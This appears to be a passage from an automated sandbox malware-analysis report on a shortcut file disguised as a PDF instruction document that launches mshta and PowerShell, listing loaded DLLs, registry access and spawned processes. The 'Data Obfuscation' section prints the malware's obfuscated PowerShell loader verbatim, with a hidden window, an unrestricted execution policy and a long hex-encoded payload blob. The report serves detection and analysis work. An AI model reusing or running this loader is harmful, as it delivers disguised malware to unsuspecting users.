        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mshtml.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msiso.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: zipfldr.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32Jump to behavior
        Source: Instruction_695-18112-002_Rev.PDF.lnk (2).d.lnkLNK file: ..\..\..\..\..\..\..\Windows\System32\OpenSSH\ssh.exe
        Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
        Source: Binary string: blib.pdb source: powershell.exe, 00000009.00000002.2436299417.0000029524A40000.00000004.00000020.00020000.00000000.sdmp

        Data Obfuscation

        barindex
        Found suspicious powershell code related to unpacking or dynamic code loading
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($XXXXXXXXXXXXXXX)$ZZZZZZZZZZZZZZZ = [System.Text.Encoding]::UTF8.GetBytes("6yhuvEFAfycywevUmeXEmytuMEnURYvUsaGyjuCEtEgeDaTUpEvuMUsuZeByGYS=")$AAAAAAAAAAAAAAA = QQQQQQQQQQQQQQQQQQQQQQQ
        Suspicious powershell command line found
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function EhNo($fVNOW){return -split ($fVNOW -replace '..', '0x$& ')};$mbaO = EhNo('C38A8314C6D512DB74485356BE39888EE9925C2281B41A870A93C8B2D5D640A69C1B84FB174E3857338A3F29B0BC201CBAE4C0E078A084FEAB36D6E5C129923577A943A7B7B9E80CD4B717B35AB910C6E3B0FA9A865CF551A2DC2ADFCFF3EBB21EBD7DEDD60EDC13026C153388485FDF1AC35BC0468A5C535651DF2806D21D4018C2A7B7E992A43E2DABB65D2351BD518D491BBBB8DF843C260A441F6A53C1EFBDAF7229D9FAE26FC27F5B05D380BC26CA0FEBDD5BA5A0EB82A1E7F9A938B5ED11EDFE83733EE5BD9B41842A66B0AED9471AA6556BF7D0C653E7003B7FA9B58B38490B6F52DF4A87D2B53F600A141D60A19DC2AA34A224EF47C6DF92B8DB56263E9C7F55EE4158FAD446B242313DDB8BF39449DB89BC72D11A11652EF4DFEFD667902331EA74794B6A67B4CDD5ACA8760D9FFD3767A211C0FA243363A1BD5BB01FCA17D6ABD4E3641CB89FE09848FC0B87C1682BD406B1FFB48111D826BF42319F86EDDF54EF392181D1835103092BD65F468D5CD7509428F489C18C9ED716C0826433468E3DC8CAC68FE4C8E73D4A7AF24E20E29CE8BC747E51C7D60211D1D9108A36E9ED5894EC918826DD0D2BA213C9CBEAED248628920C4034A6A1AC220514DD10F6495B697AB9FA5D222FF857B08914A98EF2F41EEB2A13FB672CF5121AA56B9700672AC61423E329F5BE09D7E42A8F5E7472B06B08ED17223AD27AB1FDCD50AEE7A03C7752206D59395E1E657839378114582CE5288A87307A61F294B3A99AC37DCCD3C76F9B7C1EB5B34A5AF3ADDEB53175C886FD46CD841BCCAEC99CEB11DA016155A428190129B6CD87EFFECA8E9B27B519708ED1C4B71E4854A661A036B6CBE8BD2751B09AC153946351DD8D6D3E057C12BAB88D69DD739087AF882D851CE6D6E1E28A9622113D283879B560AC3C94753656293B30A504C24C3B832C6B0F7F82A720EEBFE712E1B11CD932C9E5C7D456C06867A74AD3A97F905CED36247B87F0625B42F75BA4945635B18A82EDF26E5861C329BFEADAF94CA576635764882B1CD7A6E75D104129FC224EBFBEB94A628CEA56F0A3828F40710143735DA31B592516964E704BB489E450292571ED1B8EE1F001AE77C6FC25B2078E74A31D038E1D03ACCA3C7C6A8FAB337C633522A66604A1BB8B9C555E3BBE6348CE9B111D471D213702C17F614C86FBF8FE91B3781D35DF5B128CC95ED1667145FE3B243E6951A9455CAEC033289D883DFB031E516E037E4A4668162AD2AD1D871E1870AFCE9730FA836626E94F80307146B75CF9E7AC57BC4DC6ADAC9FBAE30D68030AE39A44BC038FC72594DAE859A181023D142321D6A31CB9F0B84D661BEC72BF3124F1B60880A358FE25760E1BD0A0F6392FB0747B86C767385A6E06D6207459916C16AECB2F1F5BD994DB8CA214ECFE96CB37CA7850202770519A107DC62590038A540A914AFE664965B27756163566BE349ED77E33B9B52EB99797311123C2913E9DDAC39EB6ECFF220A911F4CBA4BBCA42E3EFE5F7A92756B074DA2DEB89D425B04034B270C25948C41781E22C34A0F380A6C22935256D47847BB6239FAF39D9D1FC1EA9D6E43EFCFB896C1D8816DD34CD7F6D433DB2ABBA7DDC692858222F86A44530FDDF5153E885D5B67441D8C8252EE75CA3C4D9808383692638135E3551937B256F7773F54A85E36840866A5B362F59589DED49A08715A66E8242C25BFAF5F34CD1E1C54FC418EADDDF6E597A520EE2A3D0436285A094388DF2F75DC594B5562E58F69BA6B5EC4606185875510834C2B4E4D185598FA71136E84C07D63A81B60FC526FCFCDC2687FB8F2A82163A586B78C9EF88F7BAAE26CFDC354883E02A310DCEFD9A626F0DC7297EB531ABE66B7A5C983397F08D52E357D101CC123AD37EA8123CD23FBB08BD4714C8F0417A9FC433BB55A6E1D2AF00F7A078FE782C81F40749B962591
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function EhNo($fVNOW){return -split ($fVNOW -replace '..', '0x$& ')};$mbaO = EhNo('C38A8314C6D512DB74485356BE39888EE9925C2281B41A870A93C8B2D5D640A69C1B84FB174E3857338A3F29B0BC201CBAE4C0E078A084FEAB36D6E5C129923577A943A7B7B9E80CD4B717B35AB910C6E3B0FA9A865CF551A2DC2ADFCFF3EBB21EBD7DEDD60EDC13026C153388485FDF1AC35BC0468A5C535651DF2806D21D4018C2A7B7E992A43E2DABB65D2351BD518D491BBBB8DF843C260A441F6A53C1EFBDAF7229D9FAE26FC27F5B05D380BC26CA0FEBDD5BA5A0EB82A1E7F9A938B5ED11EDFE83733EE5BD9B41842A66B0AED9471AA6556BF7D0C653E7003B7FA9B58B38490B6F52DF4A87D2B53F600A141D60A19DC2AA34A224EF47C6DF92B8DB56263E9C7F55EE4158FAD446B242313DDB8BF39449DB89BC72D11A11652EF4DFEFD667902331EA74794B6A67B4CDD5ACA8760D9FFD3767A211C0FA243363A1BD5BB01FCA17D6ABD4E3641CB89FE09848FC0B87C1682BD406B1FFB48111D826BF42319F86EDDF54EF392181D1835103092BD65F468D5CD7509428F489C18C9ED716C0826433468E3DC8CAC68FE4C8E73D4A7AF24E20E29CE8BC747E51C7D60211D1D9108A36E9ED5894EC918826DD0D2BA213C9CBEAED248628920C4034A6A1AC220514DD10F6495B697AB9FA5D222FF857B08914A98EF2F41EEB2A13FB672CF5121AA56B9700672AC61423E329F5BE09D7E42A8F5E7472B06B08ED17223AD27AB1FDCD50AEE7A03C7752206D59395E1E657839378114582CE5288A87307A61F294B3A99AC37DCCD3C76F9B7C1EB5B34A5AF3ADDEB53175C886FD46CD841BCCAEC99CEB11DA016155A428190129B6CD87EFFECA8E9B27B519708ED1C4B71E4854A661A036B6CBE8BD2751B09AC153946351DD8D6D3E057C12BAB88D69DD739087AF882D851CE6D6E1E28A9622113D283879B560AC3C94753656293B30A504C24C3B832C6B0F7F82A720EEBFE712E1B11CD932C9E5C7D456C06867A74AD3A97F905CED36247B87F0625B42F75BA4945635B18A82EDF26E5861C329BFEADAF94CA576635764882B1CD7A6E75D104129FC224EBFBEB94A628CEA56F0A3828F40710143735DA31B592516964E704BB489E450292571ED1B8EE1F001AE77C6FC25B2078E74A31D038E1D03ACCA3C7C6A8FAB337C633522A66604A1BB8B9C555E3BBE6348CE9B111D471D213702C17F614C86FBF8FE91B3781D35DF5B128CC95ED1667145FE3B243E6951A9455CAEC033289D883DFB031E516E037E4A4668162AD2AD1D871E1870AFCE9730FA836626E94F80307146B75CF9E7AC57BC4DC6ADAC9FBAE30D68030AE39A44BC038FC72594DAE859A181023D142321D6A31CB9F0B84D661BEC72BF3124F1B60880A358FE25760E1BD0A0F6392FB0747B86C767385A6E06D6207459916C16AECB2F1F5BD994DB8CA214ECFE96CB37CA7850202770519A107DC62590038A540A914AFE664965B27756163566BE349ED77E33B9B52EB99797311123C2913E9DDAC39EB6ECFF220A911F4CBA4BBCA42E3EFE5F7A92756B074DA2DEB89D425B04034B270C25948C41781E22C34A0F380A6C22935256D47847BB6239FAF39D9D1FC1EA9D6E43EFCFB896C1D8816DD34CD7F6D433DB2ABBA7DDC692858222F86A44530FDDF5153E885D5B67441D8C8252EE75CA3C4D9808383692638135E3551937B256F7773F54A85E36840866A5B362F59589DED49A08715A66E8242C25BFAF5F34CD1E1C54FC418EADDDF6E597A520EE2A3D0436285A094388DF2F75DC594B5562E58F69BA6B5EC4606185875510834C2B4E4D185598FA71136E84C07D63A81B60FC526FCFCDC2687FB8F2A82163A586B78C9EF88F7BAAE26CFDC354883E02A310DCEFD9A626F0DC7297EB531ABE66B7A5C983397F08D52E357D101CC123AD37EA8123CD23FBB08BD4714C8F0417A9FC433BB55A6E1D2AF00F7A078FE782C81F40749B962591Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848CC00BD pushad ; iretd 2_2_00007FF848CC00C1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FF8477200BD pushad ; iretd 7_2_00007FF8477200C1

        Persistence and Installation Behavior

        barindex
        Windows shortcut file (LNK) starts blacklisted processes
        Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Source: LNK fileProcess created: C:\Windows\System32\mshta.exe
        Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
        Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
        Source: LNK fileProcess created: C:\Windows\System32\mshta.exeJump to behavior
        Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
        Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
